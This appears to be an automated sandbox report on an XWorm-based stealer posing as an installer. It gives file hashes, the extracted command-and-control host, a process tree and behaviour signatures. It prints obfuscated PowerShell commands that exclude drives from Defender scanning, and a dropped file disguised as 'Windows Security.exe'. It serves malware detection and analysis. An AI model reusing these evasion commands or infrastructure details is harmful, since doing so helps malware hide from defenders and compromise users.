Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
08/11/2024, 20:48
Static task
static1
Behavioral task
behavioral1
Sample
TalibanStealerInstaller.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
TalibanStealerInstaller.exe
Resource
win10v2004-20241007-en
General
-
Target
TalibanStealerInstaller.exe
-
Size
4.1MB
-
MD5
7531fbb7431039bda2b19160e0b9c2d4
-
SHA1
b7f4a971ebf8128ee1ea7cb764b9582fb73b8002
-
SHA256
6a93c6b6467f2e24918f9c39f2b0d91a14974b3af096d39dda126c02f3299bc8
-
SHA512
5b8b09d896e12f3da879939f3c925da58ba79c6c1f2559594b1eb11d8fd5f63d3afeb12484b8656e0ba929cb0bb7fbb67a566d3599769c955885ca21b4036487
-
SSDEEP
98304:51mCYY8UGo4x83fa1lyrd3qNz6VTDwgiLC/sE1:nmCWUUqi1s530+VohE
Malware Config
Extracted
xworm
lijaligibidu-35558.portmap.host:35558
-
Install_directory
%AppData%
-
install_file
Windows Security.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000015cd1-10.dat family_xworm behavioral1/memory/2976-12-0x0000000000850000-0x0000000000868000-memory.dmp family_xworm -
Xworm family
-
Executes dropped EXE 5 IoCs
pid Process 2820 TalibanStealerInstaller.exe 2976 WindowsSecurity.exe 2688 Windows Security.exe 300 c9IDU7463.exe 1480 TalibanStealerInstaller.exe -
Loads dropped DLL 4 IoCs
pid Process 2820 TalibanStealerInstaller.exe 2688 Windows Security.exe 2820 TalibanStealerInstaller.exe 2820 TalibanStealerInstaller.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TalibanStealerInstaller.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows Security.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS TalibanStealerInstaller.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer TalibanStealerInstaller.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion TalibanStealerInstaller.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2408 powershell.exe 2404 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2976 WindowsSecurity.exe Token: SeDebugPrivilege 300 c9IDU7463.exe Token: SeDebugPrivilege 2408 powershell.exe Token: SeDebugPrivilege 2404 powershell.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 2816 wrote to memory of 2820 2816 TalibanStealerInstaller.exe 30 PID 2816 wrote to memory of 2820 2816 TalibanStealerInstaller.exe 30 PID 2816 wrote to memory of 2820 2816 TalibanStealerInstaller.exe 30 PID 2816 wrote to memory of 2820 2816 TalibanStealerInstaller.exe 30 PID 2816 wrote to memory of 2820 2816 TalibanStealerInstaller.exe 30 PID 2816 wrote to memory of 2820 2816 TalibanStealerInstaller.exe 30 PID 2816 wrote to memory of 2820 2816 TalibanStealerInstaller.exe 30 PID 2816 wrote to memory of 2976 2816 TalibanStealerInstaller.exe 31 PID 2816 wrote to memory of 2976 2816 TalibanStealerInstaller.exe 31 PID 2816 wrote to memory of 2976 2816 TalibanStealerInstaller.exe 31 PID 2820 wrote to memory of 2408 2820 TalibanStealerInstaller.exe 32 PID 2820 wrote to memory of 2408 2820 TalibanStealerInstaller.exe 32 PID 2820 wrote to memory of 2408 2820 TalibanStealerInstaller.exe 32 PID 2820 wrote to memory of 2408 2820 TalibanStealerInstaller.exe 32 PID 2820 wrote to memory of 2688 2820 TalibanStealerInstaller.exe 34 PID 2820 wrote to memory of 2688 2820 TalibanStealerInstaller.exe 34 PID 2820 wrote to memory of 2688 2820 TalibanStealerInstaller.exe 34 PID 2820 wrote to memory of 2688 2820 TalibanStealerInstaller.exe 34 PID 2688 wrote to memory of 2404 2688 Windows Security.exe 35 PID 2688 wrote to memory of 2404 2688 Windows Security.exe 35 PID 2688 wrote to memory of 2404 2688 Windows Security.exe 35 PID 2688 wrote to memory of 2404 2688 Windows Security.exe 35 PID 2688 wrote to memory of 300 2688 Windows Security.exe 37 PID 2688 wrote to memory of 300 2688 Windows Security.exe 37 PID 2688 wrote to memory of 300 2688 Windows Security.exe 37 PID 2688 wrote to memory of 300 2688 Windows Security.exe 37 PID 2820 wrote to memory of 1480 2820 TalibanStealerInstaller.exe 38 PID 2820 wrote to memory of 1480 2820 TalibanStealerInstaller.exe 38 PID 2820 wrote to memory of 1480 2820 TalibanStealerInstaller.exe 38 PID 2820 wrote to memory of 1480 2820 TalibanStealerInstaller.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\TalibanStealerInstaller.exe"C:\Users\Admin\AppData\Local\Temp\TalibanStealerInstaller.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Users\Admin\AppData\Roaming\TalibanStealerInstaller.exe"C:\Users\Admin\AppData\Roaming\TalibanStealerInstaller.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdAByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYwBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAdwBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAdgBjACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAbQBrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYwB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAZgBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdwBiACMAPgA="4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2404
-
-
C:\Users\Admin\AppData\Local\Temp\c9IDU7463.exe"C:\Users\Admin\AppData\Local\Temp\c9IDU7463.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:300
-
-
-
C:\Users\Admin\AppData\Local\Temp\TalibanStealerInstaller.exe"C:\Users\Admin\AppData\Local\Temp\TalibanStealerInstaller.exe"3⤵
- Executes dropped EXE
- Enumerates system info in registry
PID:1480
-
-
-
C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.5MB
MD5cdfcc41584dcd2a57da70353cb9955a8
SHA178b0a8cda3187d7ba842c9148446da5c628370b5
SHA256be453771400d21a320f759b3b99bd7cf07d9d8301db6bce115bafae1aff79fb3
SHA5124db311aac921a20b9be5c28e66b54912065ac5aeb56b45c20fe7383ff69aa50622e6da383f029a6291525457439cd2e6ac403860af4d82bd61a86df3aad9e7dc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD53fa53b3b4ea5788d7bec18d9ccc76757
SHA1a504e104292591f6364c609a996a60995000bd5d
SHA256bc29ed4b387050964b53662f4740ed98d48590b752b9ffd653742430463dda1b
SHA51210f8d51b797ae83a48d274bcb19e96cbd8860a4e3d002508a8dd9a8aa17adff0fd22ff3fa3d9def17e111c7aae3e0b49cccdf91995d80c3213a7d6aaa3e5df73
-
Filesize
3.7MB
MD50bd9c3971db333e1ccc5c327c4b06baa
SHA12e319ceb3f8fd1cd61d5e40002e493117ed9321d
SHA256651b7894bf375daa0ec4d1fe71ba43f5fd3fcf62363d4141a767f7c8abedb216
SHA512997b7356d55218f72e289b95b6170fb7c8998a2caedc19614d118f6566453301403339a3db6a0a9b8b9d73feb17947661571040a458e938c7db649b637bb39bb
-
Filesize
75KB
MD5cf219a189dae4a022f26dd58cd5367e6
SHA176c2e7b756e894afc4e5fd7267fce398d58c518f
SHA256725c0bcdb953e39e96a0192d2712b261541647259e494c583d19697a10d2ffbe
SHA51221dc7cdd5ea07be708a5c696708207a1760851d2fbb608969254a8f3e806bbb87b6b27a4d5f4cecf1b5d90f6fc81759fd9f6222ddafdb955d41b0333ea085f1f
-
Filesize
1018KB
MD5d8cdeec022d5fda0ab78a7ecc9efa3ae
SHA13cb31d1646d3f63019a0c3745d3f2c62bdaab243
SHA256e5b7e580db8476b8e4d2ae806288984df4eb0c5a061bed61c77157a2628ae1ea
SHA5124ddd191a8c352cef83ba3dee0a2ba15fcd95c397fc13af152c2ef9731ec66c7ee332c8079567ee03e77a38225a8453aee798f573d25c35cb98921d09597ed63e
-
Filesize
971KB
MD526efc684ddd0782b295a6ee4a76e3256
SHA108cc73ef5c1b02e09765181a5acee1a7018dcffc
SHA256bf832f28b8d9f2ff077f691bd7e8a2cf46f3a4ac0ee8ee2d2f2944089abd20ab
SHA51220ba9e73514148613943db974cf88874907f9fe19e1cf5d81d9bf83ffbd233be80e925c62a5430a7ef69099e603ae54d60680020e0de58e632897f8c4aecfb49